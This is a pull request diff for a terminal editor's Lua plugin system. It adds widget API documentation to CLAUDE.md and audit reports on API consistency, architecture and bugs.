### PR TITLE
feat: Lua plugin system

### DIFF
--- a/CLAUDE.md
+++ b/CLAUDE.md
@@ -102,9 +102,12 @@ Lua plugins render UI in bottom-panel tabs via a `PanelProxy` (`p`) passed to th
 | `p:tree({...})` | `items`, `indent` (default 2), `on_select`, `on_expand`, `on_command`, `node_menu` | Expandable tree view. Items are `{id, label, expandable, children}` tables. |
 | `p:list({...})` | `items`, `on_select`, `on_command`, `node_menu` | Flat list (backed by TreeWidget, no indentation). |
 | `p:button({...})` | `label`, `on_click` | Clickable button. |
-| `p:input({...})` | `placeholder`, `prefix`, `on_change(text)`, `on_submit(text)` | Text input field. |
+| `p:input({...})` | `placeholder`, `prefix`, `clear_on_submit`, `on_change(text)`, `on_submit(text)` | Text input field. `clear_on_submit` (bool) clears text after submit. |
 | `p:vstack({...})` | `render(child_panel)`, `gap` | Vertical stack container. The `render` function receives a child panel proxy to emit nested widgets. |
+| `p:hstack({...})` | `render(child_panel)`, `gap` | Horizontal stack container. First child grows to fill available space, remaining children get fixed width. |
+| `p:scrollview({...})` | `render(child_panel)` | Scrollable container. Wraps children with mouse wheel scrolling and scrollbar when content overflows. |
 | `p:box({...})` | `render(child_panel)`, `border`, `height` | Container with optional border and fixed height. Children via `render` callback. |
+| `p:divider()` | (none) | Horizontal divider line. Single-line separator, no configuration. |
 | `p:dropdown({...})` | `label`, `entries`, `on_menu(command)` | Dropdown menu button. `entries` are `{label, command, separator}` tables. |
 
 **Raw cell API** (low-level drawing, mutually exclusive with widget methods per render):

--- a/CLAUDE.md
+++ b/CLAUDE.md
@@ -89,6 +89,36 @@ Language server support lives in `internal/lsp/`. Servers are configured per-lan
 
 Async completions and signature help use the same `PostEvent(EventInterrupt)` pattern as git blame. Document sync is full-document (not incremental). Auto-completion triggers on every text change with a configurable debounce timer (`autocomplete.debounce` in settings.json, default 150ms). Signature help triggers on `(` and `,` characters, dismissed on `)`.
 
+### Plugin Widget API
+
+Lua plugins render UI in bottom-panel tabs via a `PanelProxy` (`p`) passed to their `on_render` callback. Implementation lives in `internal/plugin/lua_panel.go` (Lua bindings), `internal/plugin/widget_desc.go` (descriptor struct), and `internal/plugin/widget_builder.go` (Go widget construction). Underlying widget types are in `internal/widgets/`.
+
+**Widget methods** (called as `p:method(args)`):
+
+| Method | Lua fields | Description |
+|---|---|---|
+| `p:label(text)` or `p:label({...})` | `text`, `style` | Static text line. `style` is a named style (see below). Supports box model. |
+| `p:title(text)` or `p:title({...})` | `text` | Bold section heading. Supports box model. |
+| `p:tree({...})` | `items`, `indent` (default 2), `on_select`, `on_expand`, `on_command`, `node_menu` | Expandable tree view. Items are `{id, label, expandable, children}` tables. |
+| `p:list({...})` | `items`, `on_select`, `on_command`, `node_menu` | Flat list (backed by TreeWidget, no indentation). |
+| `p:button({...})` | `label`, `on_click` | Clickable button. |
+| `p:input({...})` | `placeholder`, `prefix`, `on_change(text)`, `on_submit(text)` | Text input field. |
+| `p:vstack({...})` | `render(child_panel)`, `gap` | Vertical stack container. The `render` function receives a child panel proxy to emit nested widgets. |
+| `p:box({...})` | `render(child_panel)`, `border`, `height` | Container with optional border and fixed height. Children via `render` callback. |
+| `p:dropdown({...})` | `label`, `entries`, `on_menu(command)` | Dropdown menu button. `entries` are `{label, command, separator}` tables. |
+
+**Raw cell API** (low-level drawing, mutually exclusive with widget methods per render):
+
+- `p:size()` — returns `width, height`
+- `p:cell(x, y, char, style)` — set a single cell
+- `p:text(x, y, text, style)` — draw a string
+- `p:clear(x, y, w, h)` — clear a rectangle
+- `p:redraw()` — request a redraw from the event loop
+
+**Box model:** `margin_top`, `margin_bottom`, `margin_left`, `margin_right`, `padding_top`, `padding_bottom`, `padding_left`, `padding_right` — parsed via `parseBoxModel()` and applied via `applyBoxModel()`. Currently supported on `label` and `title` widgets only.
+
+**Named styles** available for `style` fields: `default`, `muted`, `border`, `success`, `danger`, `warning`, `selected`, `item`, `line`, `input`. These map to `term.Style*` constants via `styleMap` in `lua_panel.go`.
+
 ### Testing
 
 The project has three levels of testing:

--- a/audit/api-consistency.md
+++ b/audit/api-consistency.md
@@ -1,0 +1,225 @@
+# API Consistency & Test Coverage Audit
+
+## API Inconsistencies
+
+### 1. Error handling pattern mismatch across fs module
+
+- **Location**: `internal/plugin/lua_fs.go:31-65`
+- **Issue**: `fs.read()` and `fs.list()` return `nil, error_string` on failure (Go/Lua multi-return convention), but `fs.write()` returns just `error_string` on failure and zero values on success. This is a different contract within the same module.
+- **Expected**: All fallible functions in the same module should use the same error return convention.
+- **Fix**: Change `fs.write()` to return `nil, error_string` on failure, or `true` on success and `nil, error_string` on failure. This would be a breaking API change, so document it if applied.
+
+### 2. Error handling pattern mismatch across modules
+
+- **Location**: `internal/plugin/lua_fs.go`, `internal/plugin/lua_system.go`, `internal/plugin/lua_net.go`, `internal/plugin/lua_editor.go`
+- **Issue**: Each module reports errors differently:
+  - **fs**: `nil, error_string` (multi-return) for reads; single `error_string` for writes
+  - **system.exec**: Always returns a table with `exit_code=-1` and `stderr=error` on failure (never nil/error)
+  - **net.get/post**: Always returns a table with `status=0` and `error=error_msg` on failure (never nil/error)
+  - **editor**: All read functions silently return empty string/empty table when editor is nil; all write functions silently no-op
+- **Expected**: At minimum, document the error handling pattern for each module. Ideally, converge on one or two patterns (e.g., "read operations return `nil, err`; write operations return `nil, err`; batch result operations return a result table with an `error` field").
+- **Fix**: This is a design decision. The current system module and network module patterns (table with error field) are arguably better for async callbacks. The fs module pattern (multi-return) is more idiomatic Lua. Document which pattern to use where and why.
+
+### 3. "API not available" error handling is inconsistent
+
+- **Location**: `internal/plugin/lua_fs.go:33-35`, `internal/plugin/lua_system.go:33-35`, `internal/plugin/lua_net.go:62-64`, `internal/plugin/lua_editor.go:43-47`
+- **Issue**: When the backing Go API interface is nil (e.g., `p.Editor == nil`):
+  - **fs module**: Returns `nil, "filesystem API not available"` (multi-return error)
+  - **system module**: Calls `L.ArgError()` which raises a Lua error (aborts execution)
+  - **network module**: Calls `L.ArgError()` which raises a Lua error
+  - **editor module**: Returns empty string/empty table silently (no error at all)
+- **Expected**: Same behavior when the API interface is nil across all modules.
+- **Fix**: Pick one approach. Raising a Lua error (system/net pattern) is safest since a nil API indicates a bug in the host, not a user error. Apply it consistently.
+
+### 4. `sys.exec_async` args parameter is required but `sys.exec` args is optional
+
+- **Location**: `internal/plugin/lua_system.go:44-48` (exec) vs `internal/plugin/lua_system.go:82-86` (exec_async)
+- **Issue**: `sys.exec("binary")` works without args (args default to nil). `sys.exec_async("binary", callback)` will fail because it tries to interpret the callback function as the args table. The docs say "pass `{}` if none" for `exec_async`, but `exec` silently accepts a missing args parameter.
+- **Expected**: Both should handle missing args the same way.
+- **Fix**: Either make `exec` also require args (breaking change), or make `exec_async` detect whether arg 2 is a function or table (like `net.get_async` does). The latter is more user-friendly.
+
+### 5. `net.get_async` callback position is flexible, but `net.post_async` is not
+
+- **Location**: `internal/plugin/lua_net.go:99-128` (get_async) vs `internal/plugin/lua_net.go:131-163` (post_async)
+- **Issue**: `net.get_async(url, callback)` works (callback at position 2). `net.get_async(url, opts, callback)` also works (callback at position 3). But `net.post_async` always requires `opts` as position 2 and `callback` as position 3.
+- **Expected**: This is documented correctly but worth noting as a potential surprise.
+- **Fix**: Already documented. Low priority. `post_async` requiring opts makes sense since you usually need to send headers/body with POST.
+
+### 6. Box model support inconsistency between code and documentation
+
+- **Location**: `internal/plugin/lua_panel.go:572` (box), `internal/plugin/lua_panel.go:404-422` (parseBoxModel)
+- **Issue**: The `box` widget calls `parseBoxModel()` (line 572) and thus supports box model fields, but PLUGINS.md states "Widgets that support box model: `label`, `title`, `keyvalue`" -- omitting `box`. CLAUDE.md is even more outdated, saying only `label` and `title` support box model.
+- **Expected**: Documentation lists all widgets that actually support box model.
+- **Fix**: Update PLUGINS.md to add `box` to the box model support list. Update CLAUDE.md to add `keyvalue` and `box`.
+
+### 7. Divider widget has dead `applyBoxModel` call
+
+- **Location**: `internal/plugin/widget_builder.go:274-278` (createDividerWidget) and `internal/plugin/lua_panel.go:514-523` (panelDividerWidget)
+- **Issue**: `createDividerWidget()` calls `applyBoxModel(&dw.Box, desc)`, but `panelDividerWidget()` never parses box model fields from Lua input (the divider takes no arguments). The box model values will always be zero. This is dead code.
+- **Expected**: Either remove the `applyBoxModel` call, or accept optional box model arguments on divider.
+- **Fix**: Remove the `applyBoxModel` call from `createDividerWidget` since divider is documented as taking no arguments. Or, if spacing around dividers is desired, make divider accept an optional table with box model fields.
+
+## Documentation Gaps
+
+### 1. `ttt.open_drawer()`, `ttt.close_drawer()` are undocumented
+
+- **Location**: `internal/plugin/sandbox.go:224-258`
+- **Issue**: The `open_drawer` and `close_drawer` functions are implemented in the `ttt` module but not documented in `docs/PLUGINS.md`. They require the `panel.drawer` permission. Parameters: `open_drawer({render, width, min_width})`.
+- **Fix**: Add a "Drawer API" section to PLUGINS.md, or if these are intentionally hidden/experimental, mark them with a code comment.
+
+### 2. `ttt.open_tab()`, `ttt.close_tab()` are undocumented
+
+- **Location**: `internal/plugin/sandbox.go:260-290`
+- **Issue**: The `open_tab` and `close_tab` functions are implemented but not documented in `docs/PLUGINS.md`. They require the `panel.editor` permission. Parameters: `open_tab({title, render, on_event})`, `close_tab(id)`.
+- **Fix**: Add an "Editor Tab API" section to PLUGINS.md.
+
+### 3. `ttt.markdown()` is undocumented
+
+- **Location**: `internal/plugin/sandbox.go:293-309`
+- **Issue**: The `markdown` function renders markdown text into styled spans but is not documented. It takes a string and returns a table of lines, each containing an array of `{text, style}` spans.
+- **Fix**: Add documentation in the "ttt Module Functions" section of PLUGINS.md.
+
+### 4. `key_commands` feature on tree/list widgets is undocumented
+
+- **Location**: `internal/plugin/lua_panel.go:318-319` (tree), `internal/plugin/lua_panel.go:348-349` (list)
+- **Issue**: Both tree and list widgets parse a `key_commands` field from the config table. This maps single-character keys to command strings, routing them through `on_command`. This feature is not mentioned in PLUGINS.md.
+- **Fix**: Add `key_commands` to the tree and list widget documentation tables.
+
+### 5. Extra styles available but undocumented
+
+- **Location**: `internal/plugin/lua_panel.go:24-37`
+- **Issue**: The `styleMap` includes styles not listed in the Styles section of PLUGINS.md: `bold`, `code`, `syntax_comment`, `syntax_string`, `syntax_keyword`, `syntax_number`, `syntax_operator`, `syntax_function`, `syntax_type`, `syntax_builtin`, `syntax_variable`, `syntax_tag`, `syntax_attribute`. These are available to plugins but not documented.
+- **Fix**: Add these to the Styles table in PLUGINS.md, or explicitly document which are public API vs internal.
+
+### 6. HStack `height` field is undocumented
+
+- **Location**: `internal/plugin/lua_panel.go:506-508`
+- **Issue**: `panelHStackWidget` parses a `height` field to set `desc.FixedHeight`, but the HStack documentation in PLUGINS.md only lists `render` and `gap` as config fields.
+- **Fix**: Add `height` to the HStack config fields table.
+
+### 7. Label `width` field is undocumented
+
+- **Location**: `internal/plugin/lua_panel.go:225-227`
+- **Issue**: Labels parse a `width` field to set `desc.FixedWidth`, but this is not documented in PLUGINS.md.
+- **Fix**: Add `width` to the Label config fields table.
+
+### 8. `panel.editor` and `panel.drawer` permissions mentioned in code but not fully documented
+
+- **Location**: `internal/plugin/permissions.go:12-13`
+- **Issue**: The Permissions Reference in PLUGINS.md mentions `panel.drawer` as "Reserved for future use" and `panel.editor` is listed. However, the actual APIs gated by these permissions (`open_drawer`, `open_tab`) are not documented. A plugin author wouldn't know what these permissions enable.
+- **Fix**: Tie each permission to its corresponding API functions in the Permissions Reference.
+
+### 9. CLAUDE.md widget API section is outdated
+
+- **Location**: CLAUDE.md "Plugin Widget API" section
+- **Issue**: CLAUDE.md says box model is "Currently supported on `label` and `title` widgets only" -- missing `keyvalue` and `box`. Also missing the `keyvalue`, `hstack`, `scrollview`, and `divider` widgets from the method table, and missing `key_commands` from tree/list.
+- **Expected**: CLAUDE.md should reflect all currently implemented widgets and features.
+- **Fix**: Update the CLAUDE.md Plugin Widget API section to match PLUGINS.md, then update PLUGINS.md to match the code.
+
+## Test Coverage Gaps
+
+### 1. No tests for `ttt.open_drawer`, `ttt.close_drawer`, `ttt.open_tab`, `ttt.close_tab`
+
+- **Untested**: The drawer and tab APIs in `sandbox.go` lines 224-290 have no unit or e2e tests.
+- **Risk**: Permission checks, parameter parsing, and callback routing could break silently.
+- **Priority**: Medium -- these are newer APIs that may not be widely used yet, but they touch permissions and callback wiring.
+
+### 2. No tests for `ttt.show_info` and `ttt.confirm`
+
+- **Untested**: `sandbox.go` lines 187-222 define `show_info` and `confirm` with dialog callbacks. No unit tests verify parameter parsing or callback invocation.
+- **Risk**: Dialog callbacks could fail to fire or pass wrong arguments.
+- **Priority**: Medium
+
+### 3. No tests for `ttt.markdown`
+
+- **Untested**: `sandbox.go` lines 293-309 -- the markdown rendering function.
+- **Risk**: Return format (nested tables of spans) could change without detection.
+- **Priority**: Low -- depends on the underlying `markdown.Render()` which may have its own tests.
+
+### 4. No unit tests for `lua_panel.go` widget descriptor building
+
+- **Untested**: The individual widget-building functions (`panelLabelWidget`, `panelTreeWidget`, `panelListWidget`, etc.) are not unit-tested. The `panel_widget_test.go` tests raw cell API and render errors but does not test widget descriptor output.
+- **Risk**: Regressions in field parsing (e.g., adding a new field but forgetting to parse it, or box model not being applied).
+- **Priority**: High -- this is the primary plugin authoring surface. The `widget_builder_test.go` tests reconciliation but assumes correct descriptors as input.
+
+### 5. No tests for `sys.exec_async` and `net.*_async` functions
+
+- **Untested**: All async functions (`sysExecAsync`, `netGetAsync`, `netPostAsync`) involve goroutines and `PostAsync` callbacks. No tests exercise these paths.
+- **Risk**: Goroutine panics, race conditions, or callback not being invoked. The `PostAsync` callback mechanism is critical for async plugin operation.
+- **Priority**: High -- async operations are heavily used in real plugins (e.g., the Docker manager). Failures would be hard to diagnose.
+
+### 6. No tests for `manager.go` (Install, Uninstall, Update, Reload, SetEnabled)
+
+- **Untested**: The `Manager` type's lifecycle management methods have no tests. These shell out to `git clone`/`git pull` and manage the plugin registry.
+- **Risk**: Plugin installation could fail silently, registry corruption, stale panel registrations after uninstall/reload.
+- **Priority**: Medium -- these touch the filesystem and git, making them harder to test but also more failure-prone.
+
+### 7. Widget files in `internal/widgets/` lacking tests
+
+- **Untested**: The following widget implementation files have no dedicated test files:
+  - `box.go` -- box container (used heavily by plugins)
+  - `button.go` -- button widget
+  - `dropdown.go` -- dropdown menu widget
+  - `hstack.go` -- horizontal stack layout
+  - `scrollview.go` -- scrollable container
+  - `tree.go` -- tree widget (critical for plugin UI)
+  - `vstack.go` -- vertical stack layout
+  - `list_widget.go` -- list widget
+- **Risk**: Layout calculations, event handling, focus management, and rendering in these widgets could regress. Tree widget is especially critical since it's the most complex interactive widget.
+- **Priority**: High for tree.go and scrollview.go (complex interactive widgets); Medium for box.go, hstack.go, vstack.go (layout widgets); Low for button.go, dropdown.go (simpler widgets).
+
+### 8. No e2e tests for bottom panel plugins
+
+- **Untested**: The e2e test `plugin_panel_test.go` only tests sidebar panels. No e2e test verifies bottom panel plugin rendering, event routing, or tab switching.
+- **Risk**: Bottom panel plugin rendering or event routing could break without detection.
+- **Priority**: Medium
+
+### 9. No e2e tests for plugin commands and keybindings
+
+- **Untested**: While `lua_commands_test.go` tests registration at the unit level, there are no e2e tests verifying that registered plugin commands appear in the command palette or that plugin keybindings trigger their handlers.
+- **Risk**: Command/keybinding wiring between the plugin system and the app could break.
+- **Priority**: Medium
+
+### 10. No tests for event dispatch through Manager.DispatchEvent
+
+- **Untested**: `Manager.DispatchEvent()` converts Go values to Lua values and dispatches to all plugins. The type conversion (string/int/bool to lua.LValue) and multi-plugin dispatch are untested.
+- **Risk**: Type conversion bugs (e.g., missing a type case) or dispatch ordering issues.
+- **Priority**: Low -- the individual `Plugin.DispatchEvent` is tested; the manager layer adds type conversion.
+
+### 11. No functional (blackbox) tests for any plugin features
+
+- **Untested**: The `tests/functional/` directory has no tests exercising the plugin system with the real binary.
+- **Risk**: Integration issues between the plugin system and the rest of the editor (sidebar/bottom panel wiring, command palette integration, theme interaction) would not be caught.
+- **Priority**: Low for now -- e2e tests with `testHarness` provide reasonable coverage. Functional tests would be valuable once the plugin system stabilizes.
+
+## Recommendations
+
+### Immediate (before merging)
+
+1. **Add unit tests for widget descriptor building** (`lua_panel.go`). Test that `panelLabelWidget`, `panelTreeWidget`, etc. produce correct `WidgetDesc` structs from Lua table input. This is the highest-risk gap since it's the primary plugin authoring surface.
+
+2. **Add unit tests for async functions** (`sys.exec_async`, `net.get_async`, `net.post_async`). Use synchronous mocks with channel-based `PostAsync` to verify callback invocation without actual goroutine timing issues.
+
+3. **Document `open_drawer`, `close_drawer`, `open_tab`, `close_tab`, `markdown`** in PLUGINS.md, or mark them as internal/experimental with code comments.
+
+4. **Document `key_commands`** in the tree/list widget sections of PLUGINS.md.
+
+5. **Fix the box model documentation** in both PLUGINS.md and CLAUDE.md to include `box` (and `keyvalue` in CLAUDE.md).
+
+### Short-term
+
+6. **Add tests for `tree.go` in `internal/widgets/`**. The tree widget is the most complex interactive widget and is used in most plugin UIs. Rendering, expand/collapse, selection, context menus, and keyboard navigation should all be tested.
+
+7. **Add e2e tests for bottom panel plugins** and plugin command registration.
+
+8. **Standardize error handling** across modules. At minimum, document the error handling contract for each module. Ideally, make `fs.write()` return `nil, error_string` to match `fs.read()` and `fs.list()`.
+
+### Long-term
+
+9. **Add functional tests** for the plugin system once it stabilizes.
+
+10. **Consider making `sys.exec_async` detect callback position** like `net.get_async` does, to allow omitting the empty args table.
+
+11. **Add unit tests for `Manager` lifecycle operations** (install, uninstall, update, reload). These could use a temporary directory structure and skip git operations.
+
+12. **Remove dead `applyBoxModel` call** from `createDividerWidget`, or extend divider to accept box model arguments.

--- a/audit/architecture.md
+++ b/audit/architecture.md
@@ -1,0 +1,139 @@
+# Architecture Audit: Plugin System
+
+## Violations (breaks stated architecture rules)
+
+### V1: Plugin package directly imports tcell
+
+- **File**: `internal/plugin/event_convert.go:4`
+- **File**: `internal/plugin/panel_widget.go:6`
+- **File**: `internal/plugin/widget_builder.go:6`
+- **Issue**: The plugin package imports `github.com/gdamore/tcell/v2` directly. The project's architecture rule states that only `internal/term/` should import tcell. The `internal/widgets/` package already violates this rule too (every widget file imports tcell for `HandleEvent`), but the plugin package adds a third violator.
+- **Impact**: The plugin system cannot be tested without pulling in the tcell dependency. It also creates a transitive coupling path: any change to tcell's event types ripples through the plugin package.
+- **Fix**: For `event_convert.go`, define an abstract event type in `internal/term/` or `internal/widgets/` (e.g., `KeyEvent`, `MouseEvent` interfaces) and convert at the boundary in `internal/app/`. For `panel_widget.go` and `widget_builder.go`, the tcell import is only needed because `HandleEvent(tcell.Event)` and the `OnKey` callback use tcell types -- the same abstraction in `widgets.Widget` would solve both. Note: this is a systemic issue -- `internal/widgets/` already breaks the same rule, so the real fix is to define abstract event types in `internal/term/` that `widgets` and `plugin` use, with tcell conversion happening only in `internal/term/` or `cmd/ttt/`.
+
+### V2: Duplicate style maps (lua_panel.go and sandbox.go)
+
+- **File**: `internal/plugin/lua_panel.go:13-37` (`styleMap`)
+- **File**: `internal/plugin/sandbox.go:13-37` (`reverseStyleMap`)
+- **Issue**: Two separate maps maintain the same style name <-> `term.Style` mapping. `styleMap` maps `string -> term.Style` and `reverseStyleMap` maps `term.Style -> string`. They must be kept in sync manually. Adding a new named style requires editing both maps.
+- **Impact**: A forgotten update in one map silently breaks either Lua-to-Go or Go-to-Lua style resolution. This is a maintenance trap.
+- **Fix**: Define a single canonical list (e.g., `var styleEntries = []struct{ Name string; Style term.Style }{...}`) and derive both maps from it using an `init()` function or package-level var assignments.
+
+## Design Concerns (not violations but potential problems)
+
+### D1: Plugin struct has 10 callback fields -- "god struct" tendency
+
+- **File**: `internal/plugin/plugin.go:23-65`
+- **Issue**: The `Plugin` struct holds 10 function-valued callback fields (`RequestRedraw`, `PostAsync`, `Log`, `ShowContextMenu`, `ShowInfoDialog`, `ShowConfirmDialog`, `OpenDrawer`, `CloseDrawer`, `OpenTab`, `CloseTab`) plus 4 API interfaces and ~10 data fields. Every capability the host provides is injected individually. The `wirePlugin` function in `commands_plugin.go:272-376` is 100+ lines of point-by-point wiring.
+- **Impact**: Adding a new host capability requires: (1) add a field to Plugin, (2) wire it in `wirePlugin`, (3) nil-check it in the Lua binding, (4) clean it up in `Destroy()`. This is error-prone; `Destroy()` already has 14 nil-assignments.
+- **Fix**: Group related callbacks into interfaces. For example, a `PluginHost` interface:
+  ```go
+  type PluginHost interface {
+      RequestRedraw()
+      PostAsync(*PluginAsyncResult)
+      Log(level, message string)
+      ShowContextMenu(entries []widgets.MenuEntry, x, y int, onCommand func(string))
+      ShowInfoDialog(title string, entries []widgets.KeyValueEntry)
+      ShowConfirmDialog(message string, onConfirm func())
+      OpenDrawer(renderFunc *lua.LFunction, width, minWidth int)
+      CloseDrawer()
+      OpenTab(id string, renderFunc, eventFunc *lua.LFunction)
+      CloseTab(id string)
+  }
+  ```
+  Then `Plugin` holds a single `Host PluginHost` field, and the app implements that interface. This reduces the wiring surface, makes nil-checking unnecessary (the host is always set or not), and makes the contract explicit.
+
+### D2: Lua callback fields leak into WidgetDesc
+
+- **File**: `internal/plugin/widget_desc.go:77-103`
+- **Issue**: `WidgetDesc` stores `*lua.LFunction` pointers (`OnSelect`, `OnExpand`, `OnCommand`, `OnClick`, `OnChange`, `OnSubmit`, `OnMenu`). This means the descriptor layer -- which is conceptually a data description of what to render -- is tightly coupled to gopher-lua types.
+- **Impact**: Cannot serialize/deserialize widget descriptors, cannot use them from non-Lua contexts, and the descriptor layer becomes untestable without a Lua state. If you ever wanted to support a second scripting language, the descriptor types would need to change.
+- **Fix**: Store callbacks as opaque `interface{}` or use a callback registry (map of string ID -> function) so the descriptor only holds callback IDs. The widget builder would resolve IDs to actual functions. This decouples the descriptor from the Lua runtime.
+
+### D3: Manager imports `internal/config` for a single function call
+
+- **File**: `internal/plugin/manager.go:11` (imports `config`)
+- **File**: `internal/plugin/manager.go:44` (uses `config.ConfigFilePath`)
+- **Issue**: The Manager uses `config.ConfigFilePath("plugins.ttt.json")` to locate the registry file. This creates a dependency on the config package just for path resolution.
+- **Impact**: The Manager cannot be instantiated in tests without the config package's side effects. The `pluginsDir` is already passed as a constructor argument, but the registry path is discovered internally.
+- **Fix**: Pass the registry path as a parameter to `NewManager()` or `LoadAll()`, or add a `RegistryPath` field. The caller (`internal/app/`) already knows the config directory and can compute this path.
+
+### D4: Manager imports `os/exec` -- install/update shell out to `git`
+
+- **File**: `internal/plugin/manager.go:8` (imports `os/exec`)
+- **File**: `internal/plugin/manager.go:215-218` (`git clone`)
+- **File**: `internal/plugin/manager.go:275-278` (`git pull`)
+- **Issue**: `Manager.Install()` and `Manager.Update()` directly shell out to `git`. This is not injectable/mockable, making these methods impossible to unit test without a real git repo.
+- **Impact**: No tests exist for Install/Update (the test file only tests Registry). Any change to the install flow can only be verified by running it for real.
+- **Fix**: Extract a `PluginInstaller` interface (with `Clone(repoURL, targetDir string) error` and `Pull(dir string) error` methods). Inject it into Manager. The default implementation calls git; tests can use a mock.
+
+### D5: `sandbox.go` imports `internal/markdown`
+
+- **File**: `internal/plugin/sandbox.go:6`
+- **Issue**: The plugin package imports the `markdown` package to provide `ttt.markdown()` to Lua plugins. The markdown package itself imports `internal/core/highlight` and `internal/term`. This creates a dependency chain: `plugin -> markdown -> core/highlight + term`.
+- **Impact**: The plugin package transitively depends on the syntax highlighting engine. Changes to the highlighter could break the plugin system. The markdown rendering is a nice-to-have utility, not core plugin infrastructure.
+- **Fix**: This is acceptable if markdown support is considered essential to the plugin API. If it's optional, it could be registered as an extension module from `internal/app/` rather than being hardwired into `sandbox.go`.
+
+### D6: `OpenDrawer` callback takes `*lua.LFunction` as parameter
+
+- **File**: `internal/plugin/plugin.go:52`
+- **Issue**: The `OpenDrawer` and `OpenTab` callback fields take `*lua.LFunction` parameters. This means the app-side wiring code (in `commands_plugin.go`) must know about Lua function types. The host-side code creates `PluginPanelWidget` instances that hold these Lua functions.
+- **Impact**: The boundary between plugin-internal Lua details and the host application is blurred. The app package imports `gopher-lua` specifically for these callback types.
+- **Fix**: Have the plugin package create the `PluginPanelWidget` internally and pass a `widgets.Widget` to the host. The `OpenDrawer` callback would take `(widget widgets.Widget, width, minWidth int)` instead. The Lua function wrapping stays inside the plugin package where it belongs.
+
+## Coupling Issues
+
+### C1: App package imports gopher-lua
+
+- **File**: `internal/app/commands_plugin.go:14` (`lua "github.com/yuin/gopher-lua"`)
+- **Issue**: The app package imports gopher-lua because `wirePlugin` assigns callbacks that take `*lua.LFunction` parameters (for `OpenDrawer` and `OpenTab`). The app shouldn't need to know about Lua types.
+- **Impact**: If you ever replace or supplement gopher-lua with another Lua implementation, app code must change.
+- **Fix**: See D6 above -- restructure callbacks so Lua types don't leak through the Plugin struct into the app layer.
+
+### C2: PluginPanelWidget lives in plugin package but acts as a UI widget
+
+- **File**: `internal/plugin/panel_widget.go`
+- **Issue**: `PluginPanelWidget` implements the `widgets.Widget` interface and handles rendering, event dispatch, and focus management. It is essentially a UI component that lives in the plugin package rather than in `internal/widgets/` or `internal/ui/`.
+- **Impact**: The plugin package takes on UI responsibilities. The widget needs tcell for `HandleEvent`, which forces the tcell import (V1). If widget rendering patterns change, both `internal/widgets/` and `internal/plugin/` must be updated.
+- **Fix**: Move `PluginPanelWidget` to `internal/widgets/` as a generic "scriptable panel widget" that takes a render callback and event callback as Go functions (not Lua-specific). The plugin package would provide the Lua-specific adapter that wraps Lua functions into Go callbacks.
+
+### C3: Widget builder in plugin package duplicates widget creation patterns
+
+- **File**: `internal/plugin/widget_builder.go`
+- **Issue**: The `createWidget`/`updateWidget` functions in the plugin package duplicate patterns that the `internal/widgets/builder.go` package already provides. There are two separate widget construction systems: one for JSON-defined widgets (`widgets/builder.go`) and one for Lua-defined widgets (`plugin/widget_builder.go`).
+- **Impact**: Adding a new widget type requires changes in both builders. The reconciliation logic (preserving expanded state for trees, etc.) is only in the plugin builder, not available to other consumers.
+- **Fix**: Unify widget construction. Define a common `WidgetSpec` type in `internal/widgets/` and have both JSON and Lua descriptors convert to it. The reconciler/builder would live in `internal/widgets/` and serve all consumers.
+
+### C4: PanelProxy tightly couples Lua parsing with widget descriptor construction
+
+- **File**: `internal/plugin/lua_panel.go`
+- **Issue**: Each `panel*Widget` function (e.g., `panelTreeWidget`, `panelInputWidget`) does two things: (1) parses Lua table fields, and (2) constructs a `WidgetDesc`. These are interleaved in the same function body, making it hard to test the descriptor construction independently from Lua parsing.
+- **Impact**: Testing widget descriptor construction requires a Lua state. The ~600-line file mixes two concerns.
+- **Fix**: Separate Lua parsing (extract a typed struct from a Lua table) from descriptor construction (convert the typed struct to a `WidgetDesc`). This allows testing each layer independently.
+
+### C5: Event dispatch uses type assertions in the event loop
+
+- **File**: `internal/app/eventloop.go:305-314`
+- **Issue**: The event loop uses `tcell.EventInterrupt` with type-asserted payloads (`*plugin.PluginAsyncResult`, `*pluginInstallResult`, `*pluginUpdateResult`, `*RemoteRegistryResult`). Each new async plugin operation requires adding another case to the event loop's type switch.
+- **Impact**: The event loop grows linearly with the number of async plugin operations. It's a central choke point.
+- **Fix**: Use a single `PluginEvent` type with a callback field, or use a channel-based approach where plugin results are consumed by a dedicated handler, not the main event loop.
+
+## Recommendations
+
+### R1: Define a PluginHost interface (high priority)
+Collapse the 10 callback fields on `Plugin` into a single `PluginHost` interface. This is the highest-leverage change: it clarifies the contract, reduces wiring code, eliminates nil-check proliferation, and makes the boundary testable.
+
+### R2: Stop tcell from leaking into plugin (high priority)
+The `HandleEvent(tcell.Event)` method on widgets is the root cause. Define an abstract event type (`widgets.Event` or `term.Event`) and convert at the boundary. This fixes V1 and brings `internal/plugin/` in line with the architecture rules.
+
+### R3: Unify style map definitions (quick win)
+Combine `styleMap` and `reverseStyleMap` into a single source of truth. This is a 15-minute change that eliminates a maintenance hazard.
+
+### R4: Make Manager dependencies injectable (medium priority)
+Pass the registry path to the constructor. Extract git operations behind an interface. This makes the Manager fully unit-testable.
+
+### R5: Move PluginPanelWidget to widgets package (medium priority)
+It belongs with the other widget types. The plugin package should only contain Lua-specific glue code, not widget implementations.
+
+### R6: Consider unifying widget builders (long-term)
+Having two separate widget construction systems (`widgets/builder.go` for JSON, `plugin/widget_builder.go` for Lua) will diverge over time. A common `WidgetSpec` type would keep them aligned.

--- a/audit/bugs.md
+++ b/audit/bugs.md
@@ -1,0 +1,90 @@
+# Bug Audit
+
+## Critical
+
+### 1. Nil pointer dereference in async callbacks after plugin destroy
+- **File**: `internal/plugin/lua_system.go:95`, `internal/plugin/lua_net.go:117`, `internal/plugin/lua_net.go:152`
+- **Description**: In `sysExecAsync`, `netGetAsync`, and `netPostAsync`, a goroutine runs the async operation and constructs a `resultFn` callback that accesses `p.State` (e.g. `p.State.NewTable()`) without a nil check. This callback is posted to the main event loop via `PostAsync` and executed later. If the plugin is destroyed between when the goroutine starts and when `resultFn` executes on the main thread, `p.State` is nil (set to nil by `Destroy()`), causing a nil pointer dereference panic.
+- **Impact**: Application crash. Any plugin using `exec_async`, `get_async`, or `post_async` can trigger this if the user uninstalls, disables, reloads, or updates the plugin while an async operation is in flight. The go-test-runner, docker-manager, http-client, and todo-scanner plugins all use async operations.
+- **Fix**: Add a `p.State == nil` guard at the top of each `resultFn` closure before accessing `p.State`. For example in `lua_system.go`:
+  ```go
+  resultFn := func() {
+      if p.State == nil {
+          return
+      }
+      tbl := p.State.NewTable()
+      // ...
+  }
+  ```
+
+### 2. Data race on plugin fields accessed from goroutines
+- **File**: `internal/plugin/lua_system.go:110`, `internal/plugin/lua_net.go:122-124`, `internal/plugin/lua_net.go:157-159`
